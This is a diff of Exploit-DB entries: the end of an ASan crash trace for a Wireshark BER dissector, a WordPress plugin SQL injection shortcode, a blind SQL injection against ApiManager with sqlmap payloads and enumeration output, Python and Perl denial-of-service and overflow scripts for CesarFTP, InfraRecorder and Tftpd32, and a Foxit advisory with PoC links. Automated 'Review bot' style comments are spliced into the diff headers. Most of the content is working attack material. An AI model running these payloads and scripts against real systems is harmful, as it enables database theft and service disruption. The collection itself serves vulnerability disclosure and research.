#38 0x7fdd0fcb8964 in dissector_try_uint wireshark/epan/packet.c:1174:9 + #39 0x7fdd108d748d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21 + #40 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #41 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #42 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #43 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #44 0x7fdd108d3725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5 + #45 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #46 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #47 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #48 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #49 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #50 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #51 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #52 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #53 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #54 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3 + #55 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #56 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #57 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #58 0x515daf in main wireshark/tshark.c:2197:13 + +0x7fdbb5647800 is located 0 bytes to the right of 2097152-byte region [0x7fdbb5447800,0x7fdbb5647800) +allocated by thread T0 here: + #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7fdd081e9610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) + #2 0x7fdd131b731d in wmem_block_fast_alloc 
wireshark/epan/wmem/wmem_allocator_block_fast.c:126:9 + #3 0x7fdd0fc0f4ca in address_to_str wireshark/epan/address_types.c:909:18 + #4 0x7fdd0fc109b0 in address_with_resolution_to_str wireshark/epan/address_types.c:1054:16 + #5 0x7fdd108d16c5 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:494:17 + #6 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #7 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #8 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #9 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #10 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #11 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #12 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #13 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #14 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #15 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3 + #16 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #17 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #19 0x515daf in main wireshark/tshark.c:2197:13 + +SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/epan/dissectors/packet-ber.c:3990:17 in dissect_ber_constrained_bitstring +Shadow bytes around the buggy address: + 0x0ffbf6ac0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0ffbf6ac0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0ffbf6ac0f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 
0x0ffbf6ac0f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0ffbf6ac0f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==6953==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11828. Attached are two files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39327.zip + diff --git a/platforms/php/webapps/39319.txt b/platforms/php/webapps/39319.txt new file mode 100755 index 000000000..c29bcd687 --- /dev/null +++ b/platforms/php/webapps/39319.txt 
@@ -0,0 +1,77 @@
+# Exploit Title: WordPress appointment-booking-calendar <=1.1.23 - Shortcode SQL injection
+# Date: 2016-01-24
+# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
+# Exploit Author: Joaquin Ramirez Martinez [i0 security-lab]
+# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Vendor: CodePeople.net
+# Vebdor URI: http://codepeople.net
+# Version: 1.1.23
+# OWASP Top10: A1-Injection
+# Tested on: windows 10 + firefox + sqlmap 1.0.
+
+===================
+PRODUCT DESCRIPTION
+===================
+"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
+a calendar**. The booking form is linked to a **PayPal** payment process.
+
+You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
+where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
+that can be accepted for each time-slot."
+
+(copy of readme file)
+
+
+======================
+EXPLOITATION TECHNIQUE
+======================
+remote
+
+==============
+SEVERITY LEVEL
+==============
+
+critical
+
+================================
+TECHNICAL DETAILS && DESCRIPTION
+================================
+
+A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.20.
+
+The flaw was found in the function to run when a shortcode is found within a page in the wordpress site.
+The function mentioned use unsanitized attributes and a user authenticated as a editor, autor or
+administrator (compromised) can exploit this vulnerability by adding crafted shortcodes on a page or post.
+
+The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw,
+an attacker can compromise the entire web server.
+
+================
+PROOF OF CONCEPT
+================
+
+An attacker(editor, autor or administrator) can embed into a post the following shortcode...
+
+[CPABC_APPOINTMENT_LIST calendar="-1 or sleep(10)#"]
+
+... and the post will take ten seconds loading.
+
+==========
+ CREDITS
+==========
+
+Vulnerability discovered by:
+ Joaquin Ramirez Martinez [i0 security-lab]
+ strparser[at]gmail[dot]com
+ https://www.facebook.com/I0-security-lab-524954460988147/
+ https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
+
+
+========
+TIMELINE
+========
+
+2016-01-08 vulnerability discovered
+2016-01-24 reported to vendor
+2016-01-25 released appointment-booking-calendar 1.1.24
+2016-01-26 full disclosure
diff --git a/platforms/php/webapps/39320.txt b/platforms/php/webapps/39320.txt
new file mode 100755
index 000000000..4ca78e77c
--- /dev/null
+++ b/platforms/php/webapps/39320.txt
@@ -0,0 +1,48 @@
+gongwalker API Manager v1.1 - Blind SQL Injection
+
+# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection
+# Date: 2016-01-25
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/gongwalker/ApiManager
+# Software Link: https://github.com/gongwalker/ApiManager.git
+# Version: v1.1
+# Tested on: Debian
+
+# =================== Vulnerability Description =================== #
+Api Manager's index.php used tag parameters is vulnerable
+http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1
+
+# ========================= SqlMap Query ========================== #
+sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1" --level 4 --dbs --no-cast -p tag
+
+# ================= SqlMap Result(get My Test DB) ================= #
+Parameter: tag (GET)
+ Type: boolean-based blind
+ Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
+ Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb
+
+ Type: AND/OR time-based blind
+ Title: MySQL > 5.0.11 AND time-based blind (SELECT)
+ Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
+---
+[21:14:21] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Apache 2.4.10
+back-end DBMS: MySQL 5.0.11
+[21:14:21] [INFO] fetching database names
+[21:14:21] [INFO] fetching number of databases
+[21:14:21] [INFO] resumed: 25
+[21:14:21] [INFO] resumed: information_schema
+[21:14:21] [INFO] resumed: "
+[21:14:21] [INFO] resumed: ""
+[21:14:21] [INFO] resumed: '
+[21:14:21] [INFO] resumed: ''
+[21:14:21] [INFO] resumed: '''
+[21:14:21] [INFO] resumed: api
+[21:14:21] [INFO] resumed: blackcat
+[21:14:21] [INFO] resumed: edusec
+
+...
+
+
diff --git a/platforms/windows/dos/39274.py b/platforms/windows/dos/39274.py
new file mode 100755
index 000000000..2bac65a6e
--- /dev/null
+++ b/platforms/windows/dos/39274.py
@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+#-*- coding:utf-8 -*-
+# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
+# Discovery by : Irving Aguilar
+# Email : im.aguilar@protonmail.ch
+# Discovery Date : 18.01.2016
+# Tested Version : 0.99g
+# Vulnerability Type : Denial of Service (DoS)
+# Tested on OS : Windows XP Professional SP3 x86 es
+
+import socket
+
+
+buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
+target = '192.168.1.73'
+port = 21
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect = s.connect((target, port))
+print '[*] Target: ' + target
+print '[*] Port: ' + str(port)
+s.recv(1024)
+
+s.send('USER ftp\r\n')
+s.recv(1024)
+
+s.send('PASS ftp\r\n')
+s.recv(1024)
+
+s.send( buffer + '\r\n')
+print '[+] Buffer sent'
+s.close()
diff --git a/platforms/windows/dos/39329.py b/platforms/windows/dos/39329.py
new file mode 100755
index 000000000..50ed23e86
--- /dev/null
+++ b/platforms/windows/dos/39329.py
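Review bot: `connect = s.connect((target, port))` keeps the `None` that socket.connect returns, and no timeout is ever set on the socket, so an unreachable host leaves the script blocked indefinitely; drop the assignment and call `s.settimeout(5)` before connecting. The send/recv sequence is not wrapped in `try`/`finally`, so the socket is only closed on the happy path. The `print` statements are Python 2 syntax while the shebang is a bare `python`, which the header comment should state so the interpreter requirement is explicit.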
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/67076/info
+
+InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.
+
+InfraRecorder 0.53 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+# Exploit Title: InfraRecorder Unicode Buffer Overflow
+# Version: version 0.53
+# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
+# Tested on: Windows XP sp2
+# Exploit Author: Osanda Malith
+'''
+We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
+you can build a successful exploit.
+'''
+'''
+Click Edit -> Import -> import our buffer
+'''
+junk = "A"*262
+nseh = "BB"
+seh = "CC"
+junk2 = "D"*20000
+file=open("Exploit.m3u","w")
+file.write(junk)
+file.close()
+#EOF
diff --git a/platforms/windows/dos/39330.txt b/platforms/windows/dos/39330.txt
new file mode 100755
index 000000000..4ec000e56
--- /dev/null
+++ b/platforms/windows/dos/39330.txt
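Review bot: `nseh`, `seh` and `junk2` are assigned but never used — only `junk` reaches `file.write`, so the generated Exploit.m3u does not match what the docstring above describes; either delete the dead assignments or make the docstring describe what is actually written. `file` shadows the builtin and the handle is closed by hand; `with open("Exploit.m3u", "w") as fh: fh.write(junk)` is the idiom and closes on error too. The first seven lines are advisory prose placed before the shebang, so the file is a syntax error when run as a script until they are commented out; the same applies to the prose header of 39331.pl later in this commit.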
@@ -0,0 +1,66 @@
+#####################################################################################
+
+Application: Foxit Reader PDF Parsing Memory Corruption
+
+Platforms: Windows
+
+Versions: 7.2.8.1124 and earlier
+
+Author: Francis Provencher of COSIG
+
+Website: http://www.protekresearchlab.com/
+
+Twitter: @COSIG_
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably toAdobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.
+
+(http://en.wikipedia.org/wiki/Foxit_Reader)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2015-12-18: Francis Provencher from Protek Research Lab’s found the issue;
+2016-01-02: Foxit Security Response Team confirmed the issue;
+2016-01-21: Foxit fixed the issue;
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader.
+
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+A specially crafted PDF can force a dangling pointer to be reused after it has been freed. 
An attacker can leverage this vulnerability
+
+to execute arbitrary code under the context of the current process.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-02.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39330.zip
+
+###############################################################################
\ No newline at end of file
diff --git a/platforms/windows/dos/39331.pl b/platforms/windows/dos/39331.pl
new file mode 100755
index 000000000..3489ccb32
--- /dev/null
+++ b/platforms/windows/dos/39331.pl
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/67404/info
+
+Tftpd32 and Tftpd64 are prone to denial-of-service vulnerabilities.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, code-execution may be possible; however this has not been confirmed.
+
+The following products are vulnerable:
+
+Tftpd32 4.5
+Tftpd64 4.5
+
+#!/usr/bin/perl -w
+
+use IO::Socket;
+
+for (my $j = 0; $j < 2; $j++)
+{
+ sleep(2);
+ for (my $i = 0; $i < 1500; $i++)
+ {
+ $st_socket = IO::Socket::INET->new(Proto=>'udp',
+PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
+
+ $p_c_buffer = "\x0c\x0d" x 10;
+
+ print $st_socket $p_c_buffer;
+
+ close($st_socket);
+
+ print "sent " . $i . "\n";
+ }
+}
+
+exit;
+
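Review bot: The script has no `use strict; use warnings;`, so `$st_socket` and `$p_c_buffer` are undeclared package globals; declare them at first use with `my` inside the inner loop, and prefer `use warnings` over the `-w` switch. `die "connect error"` discards the reason — IO::Socket::INET reports its failure in `$@`, so `or die "socket error: $@"` makes a failed run diagnosable. The `print $st_socket $p_c_buffer;` and `close($st_socket);` calls are unchecked; `print {$st_socket} $p_c_buffer or die "send: $!";` follows the file-handle convention and surfaces errors. The C-style loops would read more naturally as `for my $j (0 .. 1) { ... }` and `for my $i (0 .. 1499) { ... }`, and the trailing `exit;` is redundant at the end of a script.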
